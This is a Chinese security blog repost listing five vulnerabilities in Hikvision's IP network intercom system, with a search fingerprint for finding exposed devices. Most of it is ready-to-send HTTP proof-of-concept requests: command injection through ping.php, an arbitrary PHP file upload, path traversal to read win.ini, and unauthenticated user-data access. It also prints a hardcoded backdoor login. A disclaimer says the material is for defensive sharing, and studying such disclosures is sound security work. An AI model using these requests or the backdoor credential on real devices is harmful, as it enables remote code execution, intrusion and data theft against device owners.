海康威视IP网络对讲系统漏洞合集

admin 2024年2月9日01:03:35评论20 views字数 2359阅读7分51秒阅读模式

免责声明

本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。

由于传播、利用本公众号所发布的而造成的任何直接或者间接的后果及损失,均由使用者本人承担。威零安全实验室公众号及原文章作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

简介

海康威视IP网络对讲系统是一种基于IP网络的音频通信解决方案,由海康威视公司提供。该系统允许用户通过网络进行实时语音通信和广播,具有高度可靠性和灵活性。

佛法语法

body="spon_base64.js"

"vendors/toastr-master/build/toastr.min.js"

海康威视IP网络对讲系统漏洞合集

漏洞点一:远程命令执行

POC:

POST /php/ping.php? HTTP/1.1Host: ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 37jsondata[type]=99&jsondata[ip]=whoami

海康威视IP网络对讲系统漏洞合集

漏洞点二:文件写入

poc:

POST /php/uploadjson.php HTTP/1.1Host: ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 60jsondata[filename]=111.php&jsondata[data]=<?php phpinfo();?>

海康威视IP网络对讲系统漏洞合集

响应包返回{"res":"1"}为成功。

文件写入后直接访问http://xxxxxxx/lan/111.php

海康威视IP网络对讲系统漏洞合集

漏洞点三:任意文件下载

POC:

GET /php/exportrecord.php?downtype=10&downname=C:\1.txt\..\Windows\win.ini HTTP/1.1Host: ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1

海康威视IP网络对讲系统漏洞合集

漏洞点四:后门账户

POC:账号密码:administrator/800823

后门账号在代码中写死的

海康威视IP网络对讲系统漏洞合集

海康威视IP网络对讲系统漏洞合集

漏洞点五:未授权访问

POC:

POST /php/getuserdata.php HTTP/1.1Host: ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 45 jsondata[pageIndex]=0&jsondata[pageCount]=30

海康威视IP网络对讲系统漏洞合集

原文始发于微信公众号(爱喝酒烫头的曹操):海康威视IP网络对讲系统漏洞合集

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月9日01:03:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   海康威视IP网络对讲系统漏洞合集https://cn-sec.com/archives/2418446.html

发表评论

匿名网友 填写信息